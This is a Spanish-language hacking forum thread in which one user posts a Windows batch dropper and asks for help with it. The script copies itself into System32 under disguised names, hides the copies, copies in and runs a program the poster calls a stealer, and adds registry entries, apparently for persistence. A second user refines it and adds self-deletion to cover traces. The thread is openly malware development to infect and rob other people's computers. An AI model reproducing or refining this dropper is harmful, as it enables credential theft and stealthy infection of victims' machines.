1.Alguien sabe si esto esta bien?
2.Como se kita la confirmacion de reepmplazo de win32.dll
Hesoyam90.exe es el stealer
Quiero que al ejecutar un bath este se autocopie un par de veces por si alguno falla
se ponga oculto y copie y ejecute el stealer

Código: Seleccionar todo

::------Copiar , ocultar y añadir------::
@echo off
Copy /y %0, "%windir%\System32\WinXpBoot.bat"
attrib +H +S "%windir%\System32\WinXpBoot.bat" 
Copy /y %0, "%windir%\System32\DllRegistrer.bat"
attrib +H +S "%windir%\System32\DllRegistrer.bat"
Copy /y %0, "%windir%\System32\antivir.bat"
attrib +H +S "%windir%\System32\antivir.bat"
Copy /y %0, "%windir%\System32\Update.bat"
attrib +H +S "%windir%\System32\Update.bat"
Copy /y %0, "%windir%\System32\SystemCriticalFile.bat"
attrib +H +S "%windir%\System32\SystemCriticalFile.bat"
copy "Hesoyam90.exe" "%windir%\System32\Hesoyam90.exe"
copy "Hesoyam90.exe" "%windir%\System32\"
copy "Hesoyam90.exe" "%windir%\System32"
attrib +H +S "%windir%\System32\Hesoyam90.exe"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\Hesoyam90.exe"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\WinXpBoot.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\DllRegistrer.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\antivir.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\Update.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\SystemCriticalFile.bat"
::------Ejecutar Hesoyam------::
@echo off
"%windir%\System32\Hesoyam90.exe"
Un hombre con una idea nueva es un loco hasta que la idea triunfa (Marc Twain)
http://darkcompany96.blogspot.com
La verdad que en ese código hay cosas sin sentido como copiar 5 archivos con el mismo código y agregarlos al registro que me imagino seguro que es para Iniciarse con el sistema. Si es así, se van a ver 5 ventanas en cmd y todos con el mismo código.

También es bueno usar variables y otras cosas, pero para no complicarte solo le puse un set.
Así quedó tu código:

Mostrar/Ocultar

Yo lo dejaría así:

Mostrar/Ocultar

Aunque no creo que haga falta copiar 2 veces el archivo Hesoyam90.exe
Y por las dudas es mejor poner al final esto:

Código: Seleccionar todo

attrib -r -s -h %ru%\WinXpBoot.bat
del %ru%\WinXpBoot.bat
del %0
Pero si ponemos este anterior, no tiene sentido crear ni copiar el archivo .bat
ya que no se lo va a usar para nada.
Asique finalmente quedaría asi:

Mostrar/Ocultar

Última edición por RoLyxRoLy el 06 Feb 2011, 21:01, editado 1 vez en total.
Imagen

Mostrar/Ocultar

Responder

Volver a “Otros lenguajes”